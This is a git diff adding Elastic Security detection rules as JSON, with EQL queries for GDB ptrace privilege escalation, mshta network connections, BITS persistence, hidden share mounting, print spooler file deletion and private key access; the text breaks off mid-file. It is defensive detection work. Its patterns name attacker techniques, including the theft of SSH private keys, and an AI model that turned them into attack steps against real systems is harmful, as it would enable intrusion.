"from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via GDB CAP_SYS_PTRACE", + "query": "sequence by host.id, process.entry_leader.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"gdb\" and\n (process.thread.capabilities.effective : \"CAP_SYS_PTRACE\" or process.thread.capabilities.permitted : \"CAP_SYS_PTRACE\") and \n user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name != null and user.id == \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c296f888-eac6-4543-8da5-b6abb0d3304f", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "c296f888-eac6-4543-8da5-b6abb0d3304f_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_106.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_106.json new file mode 100644 index 00000000000..06f5f13f312 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_106.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Mshta.exe making outbound network connections. This may indicate adversarial activity, as Mshta is often leveraged by adversaries to execute malicious scripts and evade detection.", + "from": "now-20m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mshta Making Network Connections", + "query": "sequence by process.entity_id with maxspan=10m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n not process.parent.name : \"Microsoft.ConfigurationManagement.exe\" and\n not (process.parent.executable : \"C:\\\\Amazon\\\\Amazon Assistant\\\\amazonAssistantService.exe\" or\n process.parent.executable : \"C:\\\\TeamViewer\\\\TeamViewer.exe\") and\n not process.args : \"ADSelfService_Enroll.hta\"]\n [network where host.os.type == \"windows\" and process.name : \"mshta.exe\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c2d90150-0133-451c-a783-533e736c12d7", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c2d90150-0133-451c-a783-533e736c12d7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_106.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_106.json new file mode 100644 index 00000000000..15304917780 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_106.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use the Background Intelligent Transfer Service (BITS) SetNotifyCmdLine method to execute a program that runs after a job finishes transferring data or after a job enters a specified state in order to persist on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via BITS Job Notify Cmdline", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.parent.args : \"BITS\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\WINDOWS\\\\system32\\\\directxdatabaseupdater.exe\")\n", + "references": [ + "https://pentestlab.blog/2019/10/30/persistence-bits-jobs/", + "https://docs.microsoft.com/en-us/windows/win32/api/bits1_5/nf-bits1_5-ibackgroundcopyjob2-setnotifycmdline", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-setnotifycmdline", + "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1197", + "name": "BITS Jobs", + "reference": "https://attack.mitre.org/techniques/T1197/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "c3b915e0-22f3-4bf7-991d-b643513c722f_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_107.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_107.json new file mode 100644 index 00000000000..808171f3017 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_107.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use the Background Intelligent Transfer Service (BITS) SetNotifyCmdLine method to execute a program that runs after a job finishes transferring data or after a job enters a specified state in order to persist on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via BITS Job Notify Cmdline", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.parent.args : \"BITS\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\WINDOWS\\\\system32\\\\directxdatabaseupdater.exe\")\n", + "references": [ + "https://pentestlab.blog/2019/10/30/persistence-bits-jobs/", + "https://docs.microsoft.com/en-us/windows/win32/api/bits1_5/nf-bits1_5-ibackgroundcopyjob2-setnotifycmdline", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-setnotifycmdline", + "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1197", + "name": "BITS Jobs", + "reference": "https://attack.mitre.org/techniques/T1197/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c3b915e0-22f3-4bf7-991d-b643513c722f_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108.json new file mode 100644 index 00000000000..7aa80ba0353 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108.json @@ -0,0 +1,153 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of net.exe to mount a WebDav or hidden remote share. This may indicate lateral movement or preparation for data exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mounting Hidden or WebDav Remote Shares", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : \"use\" and\n /* including hidden and webdav based online shares such as onedrive */\n process.args : (\"\\\\\\\\*\\\\*$*\", \"\\\\\\\\*@SSL\\\\*\", \"http*\") and\n /* excluding shares deletion operation */\n not process.args : \"/d*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109.json new file mode 100644 index 00000000000..85510428982 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109.json @@ -0,0 +1,153 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of net.exe to mount a WebDav or hidden remote share. This may indicate lateral movement or preparation for data exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mounting Hidden or WebDav Remote Shares", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : \"use\" and\n /* including hidden and webdav based online shares such as onedrive */\n process.args : (\"\\\\\\\\*\\\\*$*\", \"\\\\\\\\*@SSL\\\\*\", \"http*\") and\n /* excluding shares deletion operation */\n not process.args : \"/d*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_106.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_106.json new file mode 100644 index 00000000000..74c2c43aa78 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_106.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects deletion of print driver files by an unusual process. This may indicate a clean up attempt post successful privilege escalation via Print Spooler service related vulnerabilities.", + "false_positives": [ + "Uninstall or manual deletion of a legitimate printing driver files. Verify the printer file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler File Deletion", + "query": "file where host.os.type == \"windows\" and event.type : \"deletion\" and\n not process.name : (\"spoolsv.exe\", \"dllhost.exe\", \"explorer.exe\") and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.dll\"\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "c4818812-d44f-47be-aaef-4cfb2f9cc799_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_107.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_107.json new file mode 100644 index 00000000000..e0fc914e422 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_107.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects deletion of print driver files by an unusual process. This may indicate a clean up attempt post successful privilege escalation via Print Spooler service related vulnerabilities.", + "false_positives": [ + "Uninstall or manual deletion of a legitimate printing driver files. Verify the printer file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler File Deletion", + "query": "file where host.os.type == \"windows\" and event.type : \"deletion\" and\n not process.name : (\"spoolsv.exe\", \"dllhost.exe\", \"explorer.exe\") and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.dll\"\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c4818812-d44f-47be-aaef-4cfb2f9cc799_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_2.json b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_2.json new file mode 100644 index 00000000000..18ade50c2be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_2.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Attackers may try to access private keys, e.g. ssh, in order to gain further authenticated access to the environment.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Attempted Private Key Access", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"*.pem *\", \"*.pem\", \"*.id_rsa*\") and\n not process.args: (\"--tls-cert\", \"--ssl-cert\") and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptions\\\\Software\\\\*\\\\LogiLuUpdater.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\*\\\\osqueryd.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-controller.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-deception-agent.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-detection-agent.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-enforcement-agent.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-guest-agent.exe\",\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBoltUpdater.exe\",\n \"?:\\\\Program Files (x86)\\\\Schneider Electric EcoStruxure\\\\Building Operation 5.0\\\\Device Administrator\\\\Python\\\\python.exe\",\n \"?:\\\\Program Files\\\\Splunk\\\\bin\\\\openssl.exe\",\n \"?:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\openssl.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBoltUpdater.exe\",\n \"?:\\\\Windows\\\\system32\\\\icacls.exe\",\n \"?:\\\\Windows\\\\System32\\\\OpenSSH\\\\*\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 